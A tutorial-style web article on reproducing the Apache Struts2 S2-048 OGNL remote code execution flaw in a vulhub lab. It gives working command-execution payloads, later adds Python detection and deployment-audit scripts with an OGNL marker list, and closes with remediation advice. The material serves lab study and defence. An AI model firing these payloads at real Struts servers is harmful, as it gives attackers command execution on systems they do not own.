How to reproduce the Apache Struts2 S2-048 remote code execution vulnerability

WBOY
Release: 2023-05-12 19:43:10

0x00 Introduction

The Struts2 framework is an open source web application framework for developing Java EE web applications. It builds on and extends the Java Servlet API and encourages developers to adopt the MVC architecture. Struts2 takes the design ideas of WebWork as its core, absorbs some of the strengths of the original Struts framework, and provides a cleaner web application framework built on the MVC design pattern.

0x01 Vulnerability Overview

The affected configuration is the Apache Struts2 2.3.x series with the struts2-struts1-plugin plug-in enabled and the struts2-showcase directory present. The vulnerability arises when ActionMessage receives client-controlled parameter data: the data is spliced into a message string and passed on without proper handling, and evaluating the result as an OGNL expression leads to arbitrary code execution.

0x02 Impact scope

Versions in the Apache Struts 2.3.x series with the struts2-struts1-plugin plug-in enabled.

0x03 Environment setup

1. Building Apache Struts2 by hand is fairly involved, so this vulnerability environment uses the docker environment provided by vulhub.

Download address: https://github.com/vulhub/vulhub

2. After downloading, unzip the archive, enter the s2-048 directory and start the vulnerability environment:

cd vulhub-master/struts2/s2-048/   // enter the directory

docker-compose up -d   // start the target environment

3. Run docker ps to check that the containers started successfully.

4. Open http://your-ip:8080/hello.action in the browser. If the expected page appears, the environment setup is complete.

0x04 Vulnerability reproduction

1. Open the following link in the browser to reach the vulnerable page:

http://192.168.3.160:8080/integration/saveGangster.action


2. Enter ${1+1} in the first form field, "Gangster Name", fill in the remaining fields with anything, and click submit. The response shows that the OGNL expression was evaluated.

3. Replace ${1+1} in "Gangster Name" with the following payload, which executes a command:

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[' com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()). (#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@ getRuntime().exec('id').getInputStream())).(#q)}

4. Alternatively, capture the request with Burp and replace the parameter value with the command-execution payload below.

Note: the payload must be URL-encoded before it is sent.

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?( #_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class )).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id') .(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe', '/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream( true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io. IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
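The note above matters on the defensive side as well: a filter or log search that does not decode the request body before matching will miss exactly the submissions this article describes. The following Python script is an added example written for this page; it is not part of the original article or of vulhub. It takes form-encoded POST bodies (as a reverse proxy or WAF would log them), decodes them repeatedly so that double-encoded values are also normalised, and reports which parameters carry OGNL injection markers. The marker list, the parameter names and all sample bodies are constructed for illustration; the only traffic-derived strings are the ${1+1} probe and the member-access fragment already shown on this page.

```python
import re
from urllib.parse import parse_qs, unquote_plus

# Strings that show up in OGNL expression injection attempts of the S2-048 kind.
# Illustrative list, not exhaustive; extend it from your own traffic.
OGNL_MARKERS = [
    r"[%$]\{",                 # opening of an OGNL expression, %{...} or ${...}
    r"#_memberAccess",         # tampering with the OGNL member-access guard
    r"DEFAULT_MEMBER_ACCESS",
    r"getExcludedPackageNames",
    r"getExcludedClasses",
    r"@java\.lang\.Runtime@",
    r"java\.lang\.ProcessBuilder",
]
MARKER_RE = re.compile("|".join(OGNL_MARKERS))


def decode_repeatedly(value, rounds=3):
    """URL-decode until the value stops changing.

    parse_qs already decodes once; further passes catch double-encoded
    submissions, which is how a single-decode filter gets bypassed.
    """
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_form_body(body):
    """Map parameter name -> sorted list of OGNL markers found in its values."""
    hits = {}
    for name, values in parse_qs(body, keep_blank_values=True).items():
        for raw in values:
            plain = decode_repeatedly(raw)
            found = {m.group(0) for m in MARKER_RE.finditer(plain)}
            if found:
                hits.setdefault(name, set()).update(found)
    return {k: sorted(v) for k, v in hits.items()}


# Constructed sample request bodies (not captured traffic).
SAMPLE_BODIES = {
    "benign": "name=Al+Capone&age=33&description=bootlegger",
    # the ${1+1} test expression from the article, URL-encoded once
    "probe": "name=%24%7B1%2B1%7D&age=1&description=x",
    # the same probe URL-encoded twice
    "double": "name=%2524%257B1%252B1%257D&age=1",
    # fragment of the member-access tampering shown in the article, encoded once
    "bypass": "name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29"
              ".%28%23_memberAccess%3D%23dm%29%7D&age=1",
}


def scan_samples(bodies=SAMPLE_BODIES):
    """Return {label: hits} for every body that triggers at least one marker."""
    flagged = {}
    for label, body in bodies.items():
        hits = scan_form_body(body)
        if hits:
            flagged[label] = hits
    return flagged


if __name__ == "__main__":
    for label, hits in scan_samples().items():
        print(f"{label}: {hits}")
```

The benign body produces no hits, while the single- and double-encoded probes are both reported because decoding is repeated until the value is stable. In production the same function can be fed from proxy logs or run as a pre-filter in front of the application; the marker list should be tuned so that legitimate inputs containing `${` (for example, template snippets) are reviewed rather than blocked outright.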


5. Automated scripts or graphical tools can also be used; they are not demonstrated here. Such tools can be found on GitHub.

0x05 Remediation suggestions

1. Upgrade: upgrading to the latest version is recommended.

2. Depending on business requirements, disable or remove (delete) the \struts-2.3.x\apps\struts2-showcase.war package.
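Both suggestions come down to an inventory question: which deployments still carry a 2.3.x core, the struts2-struts1-plugin, or the showcase application. The following Python script is an added example for this page, not code from the original article or from the Struts project. It walks a servlet-container directory and reports those three artifact kinds by file name; an exploded struts2-showcase directory is reported as well as the packed .war, since containers unpack applications on deploy. The directory layout, the version numbers and the jar names in the sample tree are constructed for illustration. Flagging every 2.3.x core mirrors the "2.3.x series" statement in this article; check the vendor advisory for the exact release that carries the fix before treating a match as confirmed.

```python
import os
import re
import tempfile

# File-name patterns for the components the article names as preconditions:
# the showcase application and the struts2-struts1-plugin, plus a 2.3.x core.
SHOWCASE_RE = re.compile(r"^struts2-showcase(-[\d.]+)?(\.war)?$")
STRUTS1_PLUGIN_RE = re.compile(r"^struts2-struts1-plugin-([\d.]+)\.jar$")
CORE_RE = re.compile(r"^struts2-core-([\d.]+)\.jar$")


def classify(name):
    """Return a finding label for a file or directory name, or None."""
    if SHOWCASE_RE.match(name):
        return "showcase"
    if STRUTS1_PLUGIN_RE.match(name):
        return "struts1-plugin"
    m = CORE_RE.match(name)
    if m and m.group(1).startswith("2.3."):
        return "core-2.3.x"
    return None


def audit_struts_deployment(root):
    """Walk a container directory and list S2-048 relevant artifacts.

    Returns a sorted list of (label, path). Directory names are checked as
    well as file names so that an exploded showcase webapp is reported.
    """
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            label = classify(name)
            if label:
                findings.append((label, os.path.join(dirpath, name)))
    return sorted(findings)


def build_sample_deployment():
    """Create a constructed Tomcat-like tree in a temp dir (version numbers are made up)."""
    root = tempfile.mkdtemp(prefix="struts-audit-")
    lib = os.path.join(root, "webapps", "myapp", "WEB-INF", "lib")
    os.makedirs(lib)
    # an exploded copy of the showcase next to the packed .war
    os.makedirs(os.path.join(root, "webapps", "struts2-showcase"))
    sample_files = [
        os.path.join(root, "webapps", "struts2-showcase.war"),
        os.path.join(lib, "struts2-core-2.3.0.jar"),
        os.path.join(lib, "struts2-struts1-plugin-2.3.0.jar"),
        os.path.join(lib, "struts2-convention-plugin-2.3.0.jar"),  # not relevant
        os.path.join(lib, "commons-io-2.4.jar"),                    # not relevant
    ]
    for path in sample_files:
        open(path, "wb").close()  # empty placeholder; only the name matters here
    return root


if __name__ == "__main__":
    for label, path in audit_struts_deployment(build_sample_deployment()):
        print(f"{label:15} {path}")
```

Point `audit_struts_deployment` at the real container root (for Tomcat, the directory holding `webapps`) instead of the sample tree. Name-based matching is a first pass only: a core jar that was renamed or shaded, or a showcase deployed under a different context path, will not be found this way and needs a manifest or class-path check.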

Source: yisu.com